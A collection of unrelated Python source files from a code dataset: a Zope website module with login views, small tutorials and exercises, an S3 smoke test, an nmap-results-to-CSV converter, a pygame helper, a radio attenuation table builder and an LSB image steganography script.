IAuthentication,\n setup=authentication.setup_site_auth, \n name_in_container='auth')\n grok.local_utility(CookieCredentialSessionDataContainer,\n ISessionDataContainer,\n setup=authentication.setup_cookie_session_container, \n name_in_container='CookieCredentialSessionDataContainer',\n name=SESSION_KEY)\n grok.local_utility(CookieClientIdManager,\n IClientIdManager,\n setup=authentication.setup_cookie_client_manager, \n name_in_container='LifeTimeSessionClientIdManager',\n name='LifeTimeSessionClientIdManager')\n\n title = FieldProperty(interfaces.IWebSite['title'])\n description = FieldProperty(interfaces.IWebSite['description'])\n\n def __init__(self, title=u'', description=u''):\n super(WebSite, self).__init__()\n self.title = title\n self.description = description\n\n def __repr__(self):\n return '<%s %r>' % (self.__class__.__name__, self.__name__)\n\n def traverse(self, name):\n if name == 'members':\n return members.Members(self)\n\nclass Index(mars.view.PageletView):\n \"\"\"Temp display view for site\"\"\"\n grok.require(permissions.VIEW)\n\n def render(self):\n \"\"\"First try to locate an index page for the site\"\"\"\n for page in self.context.values():\n if interfaces.IFolderIndex.providedBy(page):\n view = zope.component.getMultiAdapter(\n (page, self.request), name='index')\n return view(page, self.request).render()\n template = zope.component.getMultiAdapter(\n (self, self.request), self._template_interface, \n name=self._template_name)\n return 
template(self)\n\n\nclass IndexTemplate(mars.template.TemplateFactory):\n grok.context(Index)\n grok.template('templates/index.pt')\n\n\nclass InitialManagerGroup(group.Group):\n label = u'Initial Manager Account'\n fields = field.Fields(interfaces.IWebSiteMember, prefix=\"member\").select(\n 'member.login', 'member.password', 'member.firstName', \n 'member.lastName', 'member.email')\n\n\nclass ContentMetaDataGroup(group.Group):\n label = u'Site Metadata'\n fields = field.Fields(interfaces.IWebSite).select('title', \n 'description')\n\n# try this again later\n#class IEditButtons(zope.interface.Interface):\n# apply = jsaction.JSButton(title=_('Apply'))\n# applyView = jsaction.JSButton(title=_('Apply and View'))\n\n\nclass Edit(mars.form.FormView, layout.FormLayoutSupport, \n group.GroupForm, form.EditForm):\n \"\"\"Edit form for site\"\"\"\n grok.name('edit')\n grok.require(permissions.MANAGECONTENT)\n form.extends(form.EditForm)\n label = _('Edit Metadata for the site.')\n groups = (ContentMetaDataGroup,)\n\n @button.buttonAndHandler(u'Apply and View', name='applyView')\n def handleApplyView(self, action):\n self.handleApply(self, action)\n if not self.widgets.errors:\n url = absoluteURL(self.context, self.request)\n self.request.response.redirect(url)\n\n\nclass Login(mars.form.FormView, layout.FormLayoutSupport, \n form.Form):\n grok.context(zope.interface.Interface)\n fields = field.Fields(zope.schema.TextLine(\n __name__ = 'login',\n title=_(u'Username'),\n description=_(u'Username for login.'),\n required=True),\n zope.schema.Password(\n __name__ = 'password',\n title=_(u'Password'),\n description=_(u'Password for login.'),\n required=True),\n zope.schema.Bool(\n __name__ = 'autologin',\n title=_(u'Remember me'),\n description=_(u'Auto login.'),\n default=True,\n required=False),\n zope.schema.TextLine(\n __name__ = 'camefrom',\n title=_(u'Came from'),\n description=_(u'Redirect to this url.'),\n required=True))\n status = ''\n label = _('Login')\n\n @button.buttonAndHandler(_('Login'), name='login')\n def handleLogin(self, action):\n if (not IUnauthenticatedPrincipal.providedBy(self.request.principal)):\n self.request.response.redirect(self.camefrom)\n else:\n self.status = _(\"Login unsuccessfull, please try again.\")\n\n def updateWidgets(self):\n '''See interfaces.IForm'''\n self.widgets = zope.component.getMultiAdapter(\n (self, self.request, self.getContent()), IWidgets)\n self.widgets.ignoreContext = True\n self.widgets.update()\n self.widgets['camefrom'].value = self.camefrom\n self.widgets['camefrom'].mode = 'hidden'\n\n @property\n def camefrom(self):\n camefrom = self.request.get('camefrom', None)\n if camefrom is None:\n camefrom = self.request.get('form.widgets.camefrom', None)\n if camefrom is None:\n camefrom = absoluteURL(self.context, self.request)\n return camefrom\n\nclass AutoLoginTemplateFactory(mars.form.WidgetTemplateFactory):\n \"\"\"Define a custom template for autologin field.\n\n I'm thinking that I could use this field to choose between using cookie (ie\n lifetime) and session credentials. 
In the meantime I'm leaving it with\n lifetime cookie.\n \"\"\"\n grok.name('input')\n grok.context(zope.interface.Interface)\n grok.template('templates/autologin-widget.pt')\n mars.form.view(Login)\n mars.form.field(zope.schema.Bool)\n\n\nclass Logout(mars.view.PageletView):\n grok.context(zope.interface.Interface)\n grok.require(permissions.VIEW)\n\n def update(self):\n camefrom = self.request.get('camefrom', '.')\n if not IUnauthenticatedPrincipal.providedBy(self.request.principal):\n pau = zope.component.getUtility(IAuthentication)\n ILogout(pau).logout(self.request)\n if camefrom:\n return self.request.response.redirect(camefrom)\n if camefrom is None:\n## get and use site instead of self.context?\n url = absoluteURL(self.context, self.request)\n return self.request.response.redirect(url)\n else:\n return self.request.response.redirect(camefrom)\n\nclass SiteConfigurator(grok.Adapter, configurator.ConfigurationPluginBase):\n \"\"\"Configure the site, this has access to the data submitted by the add\n form as well as local utilities defined with grok.local_utility.\"\"\"\n zope.component.adapts(interfaces.IWebSite)\n\n def __call__(self, data):\n \n auth = zope.component.getUtility(IAuthentication, \n context=self.context)\n # Add a Admin to the administrators group\n login = data['member.login']\n admin = authentication.WebSiteMember(login, data['member.password'], \n data['member.firstName'], data['member.lastName'], \n data['member.email'])\n zope.event.notify(zope.lifecycleevent.ObjectCreatedEvent(admin))\n auth['members'].add(admin)\n\n adminGroup = auth['groups']['groups.Administrators']\n adminGroup.setPrincipals(\n adminGroup.principals + (admin.__name__,), check=False)\n\n # grant permissions to roles\n role_manager = IRolePermissionManager(self.context)\n role_manager.grantPermissionToRole(permissions.MANAGESITE, \n roles.ADMINISTRATOR)\n role_manager.grantPermissionToRole(permissions.MANAGECONTENT, \n roles.ADMINISTRATOR)\n role_manager.grantPermissionToRole(permissions.MANAGEUSERS, \n roles.ADMINISTRATOR)\n role_manager.grantPermissionToRole(permissions.VIEW, \n roles.ADMINISTRATOR)\n role_manager.grantPermissionToRole(permissions.MANAGECONTENT, \n roles.MEMBER)\n role_manager.grantPermissionToRole(permissions.VIEW, \n roles.MEMBER)\n\n # grant VIEW to unauthenticated users.\n prin_manager = IPrincipalPermissionManager(self.context)\n unauth = zope.component.queryUtility(IUnauthenticatedGroup,\n context=self.context)\n if unauth is not None:\n prin_manager.grantPermissionToPrincipal(permissions.VIEW, \n unauth.id)\n","sub_path":"Sandbox/darrylcousins/tfws.website/tfws.website/tfws/website/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":11513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"640049570","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\nCreated on Sat Sep 12 10:23:55 2020\n\n@author: hankui\n\n\"\"\"\n\n\n# Link to question: https://leetcode.com/problems/shuffle-the-array/\n\n\n#%%\ntest = [2,5,1,3,4,7]\n\n\n#%%\ndef shuffle(nums):\n \n half_l = int(len(nums)/2)\n \n res = []\n \n for i in range(half_l):\n #print(i)\n res.extend([nums[i],nums[i+half_l]])\n \n return res\n\n\n#%%\nshuffle(test)","sub_path":"Q1470_shuffle.py","file_name":"Q1470_shuffle.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"364428098","text":"\n\nimport numpy as np\n\n# Pandas, conventionally 
imported as pd\nimport pandas as pd\n\n# Plotting modules and settings.\nimport matplotlib.pyplot as plt\nimport seaborn as sns\ncolors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728',\n '#9467bd', '#8c564b', '#e377c2', '#7f7f7f',\n '#bcbd22', '#17becf']\nsns.set(style='whitegrid', palette=colors, rc={'axes.labelsize': 16})\n\n# make data\n# Dictionary of top men's World Cup scorers and how many goals\nwc_dict = {'Klose': 16,\n 'Ronaldo': 15,\n 'Müller': 14,\n 'Fontaine': 13,\n 'Pelé': 12,\n 'Kocsis': 11,\n 'Klinsmann': 11}\n\n#convert dictionary into a Series\ns_goals = pd.Series(wc_dict)\n\n# Dictionary of nations\nnation_dict = {'Klose': 'Germany',\n 'Ronaldo': 'Brazil',\n 'Müller': 'Germany',\n 'Fontaine': 'France',\n 'Pelé': 'Brazil',\n 'Kocsis': 'Hungary',\n 'Klinsmann': 'Germany'}\n\ns_nations = pd.Series(nation_dict)\n\ndf_wc = pd.DataFrame({'nation':s_nations, 'goals':s_goals})\n","sub_path":"pandas_tut.py","file_name":"pandas_tut.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"171809726","text":"#!/bin/env python\n\n\"\"\"\nThis script is a basic smoke test for the s3 protocol\n1. List buckets\n2. Create bucket\n3. Upload file\n4. Copy file between buckets\n5. Download file #to-do\n6. Remove file\n7. Remove bucket\n#ref: https://github.com/ceph/s3-tests/blob/master/s3tests_boto3/common.py\n\"\"\"\n\nimport boto3\nimport time\nimport os\nfrom botocore.exceptions import ClientError\nimport logging\n\n##########config\nENDPOINT_URL = 'https://s3.amazonaws.com'\nACCESS_KEY = '12345'\nSECRET_KEY = '12345'\nPREFIX = 's3-tests'\n\n#Boto3 resources\ndef resource():\n s3 = boto3.resource('s3',\n aws_access_key_id=ACCESS_KEY,\n aws_secret_access_key=SECRET_KEY,\n endpoint_url = ENDPOINT_URL)\n return s3\ns3 = resource()\n\n#Client resources\ndef client():\n s32 = boto3.client('s3',\n aws_access_key_id=ACCESS_KEY,\n aws_secret_access_key=SECRET_KEY,\n endpoint_url = ENDPOINT_URL)\n return s32\ns32 = client()\n\n#Generate bucket name\ndef nameGen():\n epoch_time = int(time.time())\n prefix = PREFIX\n mybucket = (prefix) + (str(epoch_time))\n return mybucket\n\n#Create random bucket\ndef createBucket():\n bucket = nameGen()\n print(\"Created: \" + \"s3://\" + bucket)\n s3.create_bucket(Bucket=bucket)\n time.sleep(1)\n return bucket\n\ndef listBucket():\n for bucket in s3.buckets.all():\n print(\"{}\".format(\"s3://\" + bucket.name))\n\n#Create basic txt object\ndef createObject():\n #print(\"pwd: \" + os.getcwd())\n f = open(\"object1.txt\", \"w\")\n f.write(\"Object Data\")\n f.close()\n f = open(\"object1.txt\", \"r\")\n #print(\"object1.txt \\n \" + f.read())\ncreateObject()\n\n#Delete basic txt object\ndef osCleanUp():\n print(os.getcwd())\n os.remove(\"object1.txt\")\n print(\" Removed:\\n \" + \"object1.txt\")\n\n##########tests\ndef create_bucket():\n #Create and delete bucket\n bucket1 = createBucket()\n s3.Bucket(bucket1).delete()\ncreate_bucket()\n\ndef create_bucket_and_object():\n #Upload object\n bucket2 = createBucket()\n s32.upload_file(\n \"object1.txt\", bucket2 , \"object1.txt\")\n s3.Object(bucket2, \"object1.txt\").delete()\n s3.Bucket(bucket2).delete()\ncreate_bucket_and_object()\n\ndef copy_objects_between_buckets():\n #copy object between two buckets\n bucket3 = createBucket()\n bucket4 = createBucket()\n s32.upload_file(\n \"object1.txt\", bucket3 , \"object1.txt\")\n copy_source = {\n 'Bucket': bucket3,\n 'Key': 'object1.txt'}\n s3.meta.client.copy(copy_source, bucket4, 
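# With df_wc built as above, rows are indexed by player name, so lookups and
# grouped aggregates fall out directly; two illustrative queries:
print(df_wc.loc["Klose", "goals"])             # 16
print(df_wc.groupby("nation")["goals"].sum())  # total goals per nation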
'object1.txt')\n s3.Object(bucket3, \"object1.txt\").delete()\n s3.Object(bucket4, \"object1.txt\").delete()\n s3.Bucket(bucket3).delete()\n s3.Bucket(bucket4).delete()\ncopy_objects_between_buckets()\n\n#debug\nprint(\"Tests complete. Cleaning up.\\n Left over buckets:\")\nlistBucket()\nosCleanUp()\n","sub_path":"scripts/python/s3tests.py","file_name":"s3tests.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"149005672","text":"import os\nfrom InquirerPy.utils import color_print\n\nfrom .async_tasks.randomize import Randomizer\n\nclass Session:\n '''\n this one's in charge of activating session-related tasks\n '''\n\n def __init__(self,client):\n self.client = client \n\n try:\n self.previous_presence = self.client.fetch_presence()\n except:\n self.previous_presence = {}\n self.presence = self.previous_presence\n self.ingame = False\n\n async def randomizer_check(self):\n if (self.presence[\"sessionLoopState\"] != self.previous_presence[\"sessionLoopState\"]) and (self.previous_presence[\"sessionLoopState\"] == \"INGAME\" and self.presence[\"sessionLoopState\"] == \"MENUS\"):\n color_print([(\"Cyan bold\",\"-- GG --\")])\n Randomizer(self.client)\n \n async def update_presence(self):\n self.previous_presence = self.presence \n\n try:\n self.presence = self.client.fetch_presence()\n await self.randomizer_check()\n except:\n color_print([(\"Tomato\",\"VALORANT não está mais rodando, saindo...\")])\n os._exit(1)\n\n return self.presence\n","sub_path":"src/core_game/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"332149890","text":"import pygame\r\n\r\nclass Screen_Display():\r\n def text_objects(text, font, color):\r\n textSurface = font.render(text, True, color)\r\n return textSurface, textSurface.get_rect()\r\n\r\n def message_display(gD, text, size, color, centerX, centerY):\r\n font = pygame.font.SysFont('arial', size)\r\n textSurf, TextRect = Screen_Display.text_objects(text, font, color)\r\n TextRect.center = ((centerX),(centerY))\r\n gD.blit(textSurf, TextRect)\r\n\r\nclass Button():\r\n def __init__(self, rect, text, textsize, textcolor):\r\n self.rect = rect\r\n self.font = pygame.font.SysFont('arial', textsize)\r\n self.textSurf, self.textRect = Screen_Display.text_objects(text, self.font, textcolor)\r\n self.textRect.center = ((rect[0] + (rect[2]/2), rect[1] + (rect[3]/2)))\r\n\r\n def draw(self, gD, ButColor):\r\n pygame.draw.rect(gD, ButColor, (self.rect))\r\n gD.blit(self.textSurf, self.textRect)\r\n\r\n def optClick(self, gD, ShadowColor, ButColor, command=None, command2=None):\r\n mouse = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n if self.rect[0] + self.rect[2] > mouse[0] > self.rect[0] and self.rect[1] + self.rect[3] > mouse[1] > self.rect[1]:\r\n pygame.draw.rect(gD, ShadowColor, (self.rect))\r\n gD.blit(self.textSurf, self.textRect)\r\n if click[0] == 1:\r\n if command != None:\r\n command()\r\n if command2 != None:\r\n command2()\r\n else:\r\n pygame.draw.rect(gD, ButColor, (self.rect))\r\n gD.blit(self.textSurf, self.textRect)\r\n\r\nclass InvisButton():\r\n def __init__(self, rect):\r\n self.rect = rect\r\n\r\n def optClick(self, command=None, command2=None):\r\n mouse = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n if self.rect[0] + self.rect[2] > mouse[0] > self.rect[0] and self.rect[1] + 
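# The module docstring above marks "5. Download file" as to-do; a sketch in
# the same style as the other tests, assuming the module-level s3/s32 handles
# and the createBucket() helper are in scope:
def download_object():
    bucket5 = createBucket()
    s32.upload_file("object1.txt", bucket5, "object1.txt")
    s32.download_file(bucket5, "object1.txt", "object1_copy.txt")
    os.remove("object1_copy.txt")  # local cleanup of the downloaded copy
    s3.Object(bucket5, "object1.txt").delete()
    s3.Bucket(bucket5).delete()
download_object()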
self.rect[3] > mouse[1] > self.rect[1]:\r\n if click[0] == 1:\r\n if command != None:\r\n command()\r\n if command2 != None:\r\n command2()\r\n\r\n","sub_path":"WebAppStuff/PyGameFuncs.py","file_name":"PyGameFuncs.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"519367472","text":"from pprint import pprint\n\nfts ={'09:35': 'FREEPORT',\n\t '17:00': 'FREEPORT',\n\t '09:55': 'WEST END',\n\t '19:00': 'WEST END',\n\t '10:45': 'TREASURE CAY',\n\t '12:00': 'TREASURE CAY',\n\t '11:45': 'ROCK SOUND',\n\t '17:55': 'ROCK SOUND',}\n\n\ndests = set(fts.values())\n\ndests_of_flights = []\n#for destination in dests:\n# dests_of_flights(destination) = []\nfor k, v in fts.items():\n if v == 'WEST END':\n dests_of_flights.append(k)\n\nprint(dests_of_flights)\n\ndests_of_flights_1 = [k for k,v in fts.items() if v == 'WEST END']\n\nprint(dests_of_flights_1)\n\n\nunique_dest_n_time = {}\nfor dest in dests:\n unique_dest_n_time[dest] = [k for k,v in fts.items() if v == dest]\n\npprint(unique_dest_n_time)\n\n'''Generator of dictionaries with nested lists generator'''\nunique_dest_n_time_2 = {dest: [k for k,v in fts.items() if v == dest] for dest in set(fts.values())}\n\npprint(unique_dest_n_time_2)\n","sub_path":"webapp_test_drive5_14_2021/generators_try_3.py","file_name":"generators_try_3.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"594804278","text":"#!/usr/bin/env python\n# Standard Python libraries.\nimport csv\nimport glob\nimport os\nimport shutil\n\n# Third party Python libraries.\nfrom libnmap.parser import NmapParser\n\n# Custom Python libraries.\n\n\nclass ScanEvent:\n\n # Variables that will eventually be fields in big data analytics platform.\n def __init__(self):\n self.start_time = \"\"\n self.end_time = \"\"\n self.site_name = \"\"\n self.scanner = \"\"\n self.address = \"\"\n self.transport = \"\"\n self.port = \"\"\n self.app = \"\"\n self.app_version = \"\"\n self.state = \"\"\n\n def to_list(self):\n output = []\n output.append(self.start_time)\n output.append(self.end_time)\n output.append(self.site_name)\n output.append(self.scanner)\n output.append(self.address)\n output.append(self.transport)\n output.append(self.port)\n output.append(self.app)\n output.append(self.app_version)\n output.append(self.state)\n\n return output\n\n\ndef export_to_csv(events, output):\n output = output.replace(\".xml\", \".csv\")\n if len(events) != 0:\n\n header_fields = [\n \"starttime\",\n \"endtime\",\n \"siteName\",\n \"scanner\",\n \"dest_ip\",\n \"transport\",\n \"dest_port\",\n \"app\",\n \"service\",\n \"state\",\n ]\n\n with open(output, \"w\") as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(header_fields)\n\n for event in events:\n writer.writerow(event.to_list())\n\n\ndef main():\n root_dir = \"/home/scantron/master\"\n\n # Build directory paths.\n complete_dir = os.path.join(root_dir, \"scan_results\", \"complete\")\n processed_dir = os.path.join(root_dir, \"scan_results\", \"processed\")\n bigdata_analytics_dir = os.path.join(root_dir, \"for_bigdata_analytics\")\n\n # Grab a list of xml files from the \"complete\" folder.\n xml_scans = glob.glob(os.path.join(complete_dir, \"*.xml\"))\n\n # Loop through all valid xml files and export them to csv files, then move them to the \"processed\" directory.\n for scan in xml_scans:\n\n try:\n events = []\n report = 
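# A minimal event loop wiring up the Button class above; geometry and colors
# are arbitrary, and pygame.init() must run before SysFont is usable.
import pygame

pygame.init()
gD = pygame.display.set_mode((640, 480))
start = Button((220, 200, 200, 60), "Start", 28, (255, 255, 255))
running = True
while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
    gD.fill((30, 30, 30))
    # optClick draws the hover or normal state itself and fires command on click
    start.optClick(gD, (90, 90, 90), (60, 60, 60), command=lambda: print("clicked"))
    pygame.display.update()
pygame.quit()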
NmapParser.parse_fromfile(scan)\n\n # Loop though all hosts in xml file. Create event objects storing the necessary information.\n for host in report.hosts:\n # Loop through services for each host.\n if len(host.services) != 0:\n for service in host.services:\n event = ScanEvent()\n event.start_time = report.started\n event.end_time = report.endtime\n\n # \"scan\" variable is constructed as \"result_file_base_name\" in master/scan_scheduler.py\n scan_file_name = os.path.basename(scan)\n event.site_name = scan_file_name.split(\"__\")[0]\n event.scanner = scan_file_name.split(\"__\")[1]\n\n # Extract port and service information.\n event.address = host.address\n event.transport = service.protocol\n event.port = service.port\n event.app = service.service\n event.state = service.state\n\n data = service.service_dict\n event.app_version = \"\"\n if \"product\" in data:\n event.app_version += f\"{data['product']}\"\n if \"version\" in data:\n event.app_version += f\"{data['version']}\"\n if \"extrainfo\" in data:\n event.app_version += f\"{data['extrainfo']}\"\n\n events.append(event)\n\n # The file has been completely parsed...create csv files in \"for_bigdata_analytics\" directory.\n export_to_csv(events, os.path.join(bigdata_analytics_dir, os.path.basename(scan)))\n\n # Extract the base file name from the .xml scan file name.\n base_scan_file_name = os.path.basename(scan).split(\".xml\")[0]\n\n # Find all the .nmap, .xml, and .gnmap files for the base_scan_file_name.\n base_scan_files = glob.glob(os.path.join(complete_dir, f\"{base_scan_file_name}*\"))\n\n # csv files have been created, move all nmap scan file types from \"completed\" to \"processed\" folder.\n # Extract file name and rebuild full path for destination.\n for scan_file in base_scan_files:\n shutil.move(\n scan_file, # source\n os.path.join(os.path.join(processed_dir, scan_file.split(\"/\")[-1])), # destination\n )\n\n except Exception as e:\n print(f\"Exception processing file: {scan}. Exception: {e}\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"master/scan_results/nmap_to_csv.py","file_name":"nmap_to_csv.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"355065957","text":"import numpy as np\nimport fplib_FD\nimport sys\n\n# Move function `readvasp(vp)` from test set to `fplib_FD.py`\n\ndef test2(v1, v2):\n ntyp = 1\n nx = 300\n lmax = 1\n cutoff = 6.5\n znucl = np.array([3], int)\n lat1, rxyz1, types = fplib_FD.readvasp(v1)\n lat2, rxyz2, types = fplib_FD.readvasp(v2)\n contract = False\n fp1 = fplib_FD.get_fp(contract, ntyp, nx, lmax, lat1, rxyz1, types, znucl, cutoff)\n fp2 = fplib_FD.get_fp(contract, ntyp, nx, lmax, lat2, rxyz2, types, znucl, cutoff)\n\n dist = fplib_FD.get_fpdist(ntyp, types, fp1, fp2)\n print ('fingerprint distance: ', dist)\n\n\nif __name__ == \"__main__\":\n args = sys.argv\n v1 = args[1]\n v2 = args[2]\n test2(v1, v2)\n","sub_path":"fplib_test/fp_basic_test2.py","file_name":"fp_basic_test2.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"407647822","text":"# -*- coding: utf-8 -*-\n\"\"\"\nFunction that creates an 2D data table with probability and elevation angle as the\nvarrying inputs using the square tiled rectangle approach. 
\n\nCreated on Wed Oct 28 13:05:02 2020\n\nCopywrite The Aerospace Corporation 2020\n\n@author: MAW32652\n\"\"\"\n\nimport itur\nimport numpy as np\nfrom tiler import tiler\n\n###Default input variables \nlat = 39 #latitude\nlon = 283 #longitude\nhs = 1 #altitude [km]\nf = 20 #frequency [GHz]\nd = 3 #antenna diameter [m] \ntau = 45 #polarization tilt angle [degrees]\n\ndef tiledTable(pList, eleList, lat = lat, lon = lon, hs = hs, f = f, d = d, tau = tau):\n #check to see if this is the first iteration. \n #if it is, create an array of correct dimmensions for output\n output = np.zeros((len(pList), len(eleList)))\n \n #Variable initialization\n eleCount = 0\n pCount = 0\n \n dimList = tiler(eleList, pList, dimList = [])\n \n for dim in dimList:\n \n #Case where the input lists are of the same length\n if len(pList) == len(eleList):\n #Calculate the results \n result = itur.atmospheric_attenuation_slant_path(lat, lon, f, eleList, pList, d, hs, return_contributions =False, include_gas = True)\n \n #replace the correct data cells in the output array.\n output[pCount : pCount + len(eleList), eleCount : eleCount + len(pList)] = result\n \n #case where the pList dimension is larger than the eleList dimension.\n elif len(pList) > len(eleList):\n #Calculate the results for pList - eleList and all of eleList\n result = itur.atmospheric_attenuation_slant_path(lat, lon, f, eleList, pList[:dim], d, hs, return_contributions =False, include_gas = True) \n \n #replace the correct data cells in the output array. \n #the p rows that havent beel filled plus the number of rows equal to dim\n #all the ele columns that havent already been filled. \n output[pCount : pCount + dim, eleCount:] = result\n \n \n #update the offset variables\n pCount += dim\n pList = pList[dim:]\n \n \n #case where the eleList dimension is larger than the pList dimension.\n elif len(eleList) > len(pList):\n #Calculate and append the results for all of pList and eleList - pList.\n result = itur.atmospheric_attenuation_slant_path(lat, lon, f, eleList[:dim], pList, d, hs, return_contributions =False, include_gas = True)\n \n #replace the correct data cells in the output array. 
\n            #all of the p rows that haven't been filled\n            #the ele columns that haven't been filled plus the number of columns equal to dim\n            output[pCount:, eleCount: eleCount + dim] = result\n            \n            \n            #update the offset variables\n            eleCount += dim\n            eleList = eleList[dim:]  \n    return output\n","sub_path":"tiledTable.py","file_name":"tiledTable.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"349157398","text":"##\r\n\r\n# Authors: Scott Towne and Jeriah Caplinger\r\n\r\n# Description: This file contains the functions used to implement steganography\r\n\r\n# Version: May 2019\r\n##\r\n\r\nfrom FileFunctions import select_encoded_file, select_text_file\r\nfrom PIL import Image\r\nimport subprocess\r\nimport sys\r\nimport numpy as np\r\nimport os\r\n\r\n\r\n\"\"\"\r\nThis function encodes an image with text data using the lsb algorithm.\r\n@param: copyLocation the path to the image in the Spike folder currently being displayed\r\n@return: returns 0 if it could not encode, returns nothing otherwise\r\n\"\"\"\r\ndef lsb_alg_text(copyLocation):\r\n    file_location = str(select_text_file())\r\n    array = file_location.split(\"\\'\")\r\n    file = array[1]\r\n    file_location = file\r\n    \r\n    \r\n    # we open our cover image\r\n    # and get the dimensions of the cover image for use in determining if we can encode our\r\n    # data into the image\r\n    cover_image = Image.open(copyLocation)\r\n    # width and height in pixels\r\n    cover_width, cover_height = cover_image.size\r\n    \r\n    # loads our pixels from our cover image\r\n    cover_pixs = cover_image.load()\r\n    \r\n    # for use in bit level manipulations\r\n    encode_a_0 = 254\r\n    encode_a_1 = 1\r\n    \r\n    # indexes of the cover image for encoding\r\n    cover_i= 0\r\n    cover_j = 0\r\n    # which lsb we are on\r\n    max_lsb_used = 0\r\n    \r\n    text = open(file_location, \"r\")\r\n    message_list = list(text.read())\r\n    text.close()\r\n    \r\n    \r\n    # we use these numbers to determine if we can encode the text file into the\r\n    # image\r\n    max_size = (cover_width * cover_height)\r\n    total_bits = len(message_list)\r\n    \r\n    #if we cannot encode the text file \r\n    if total_bits > max_size:\r\n        print(\"Sorry, the cover image is not big enough to encode the text file.\")\r\n        return 0\r\n    \r\n    \r\n    for character in message_list:\r\n        binary_list = char_to_binary(character)\r\n        #we encode every bit in that pixel\r\n        while len(binary_list) != 0:\r\n            bit_to_encode = int(binary_list.pop(0))\r\n            \r\n            # just means we need to go on to the next line\r\n            if cover_j == cover_width:\r\n                cover_j = 0\r\n                cover_i += 1\r\n                # means we are at the end of our image\r\n                if cover_i == cover_height:\r\n                    encode_a_0 = encode_a_0 & 127 # from 11111110 becomes 01111110\r\n                    encode_a_0 = encode_a_0 << 1 # then 11111100\r\n                    encode_a_0 = encode_a_0 | encode_a_1 # finally 11111101\r\n                    # for encoding a 1, it is quite simple: 00000001 becomes 00000010\r\n                    encode_a_1 = encode_a_1 << 1\r\n                    cover_i = 0\r\n                    max_lsb_used += 1\r\n            \r\n            \r\n            get_cover_px = cover_pixs[cover_j, cover_i]\r\n            \r\n            #the section of bits that we are going to encode \r\n            get_blue_bits = get_cover_px[2] \r\n            \r\n            \r\n            if bit_to_encode == 0:\r\n                # we AND with encode_a_0 because we need to \"implant\" a 0 in the lsb\r\n                get_blue_bits = get_blue_bits & encode_a_0\r\n                encoded_pixel = (get_cover_px[0], get_cover_px[1], get_blue_bits)\r\n                cover_pixs[cover_j, cover_i] = encoded_pixel\r\n                cover_j += 1\r\n            elif bit_to_encode == 1:\r\n                # we OR with encode_a_1 because we need to \"implant\" a 1 in the lsb\r\n                get_blue_bits 
= get_blue_bits | encode_a_1\r\n encoded_pixel = (get_cover_px[0], get_cover_px[1], get_blue_bits)\r\n cover_pixs[cover_j, cover_i] = encoded_pixel\r\n cover_j += 1\r\n \r\n cover_image.save(copyLocation)\r\n \r\n write_text_key(cover_j, cover_i, max_lsb_used)\r\n \r\n print(\"successfully encoded\") \r\n\r\n\r\n\r\n\"\"\"\r\nFunction that decodes an image that has text encoded inside of it using the LSB algorithm\r\n@param: copyLocation the path to the image in the Spike folder currently being displayed\r\n\"\"\"\r\ndef decode_lsb_text(copyLocation):\r\n # gets all parameters that we need to decode\r\n key_file = select_text_file()\r\n key_array = read_key(key_file)\r\n last_j = int(key_array[0])\r\n last_i = int(key_array[1])\r\n max_lsb_used = int(key_array[2])\r\n \r\n #gets all the pixels from the encoded image\r\n encoded_image = Image.open(copyLocation)\r\n encoded_px = encoded_image.load()\r\n cover_width, cover_height = encoded_image.size\r\n \r\n encode_i = 0\r\n encode_j = 0\r\n extract_a_bit = 1\r\n shift_bits = 0\r\n # holds the chars and text that make up the secret text\r\n complete_text = []\r\n complete_char = []\r\n \r\n \r\n # we iterate through the cover image \r\n while encode_i < cover_height and max_lsb_used > 0:\r\n if encode_i == last_i:\r\n cover_width = last_j\r\n while encode_j < cover_width:\r\n # grab a pixel from the cover image and get the blue bits i.e. the one with the secret data\r\n encoded_rgb = encoded_px[encode_j, encode_i]\r\n blue_coded_bits = encoded_rgb[2]\r\n # we get the lsb\r\n decoded = blue_coded_bits & extract_a_bit\r\n decoded = decoded >> shift_bits\r\n\r\n \r\n complete_char.insert(0, decoded)\r\n # we continue to do this until we have enough bits to make up a char\r\n if len(complete_char) == 8:\r\n # we have to reverse the bit list because of the order of popping/inserting\r\n complete_char.reverse()\r\n \r\n our_char = chr(int(binary_to_string(complete_char), 2))\r\n # empty our char list\r\n complete_char = []\r\n \r\n complete_text.append(our_char)\r\n encode_j += 1\r\n encode_j = 0\r\n encode_i += 1\r\n if encode_i == cover_height:\r\n encode_i = 0\r\n max_lsb_used = max_lsb_used - 1\r\n extract_a_bit = extract_a_bit << 1\r\n shift_bits += 1\r\n \r\n \r\n \r\n \r\n # we iterate through the cover image\r\n while encode_i <= last_i:\r\n if encode_i == last_i:\r\n cover_width = last_j\r\n while encode_j < cover_width:\r\n # grab a pixel from the cover image and get the blue bits 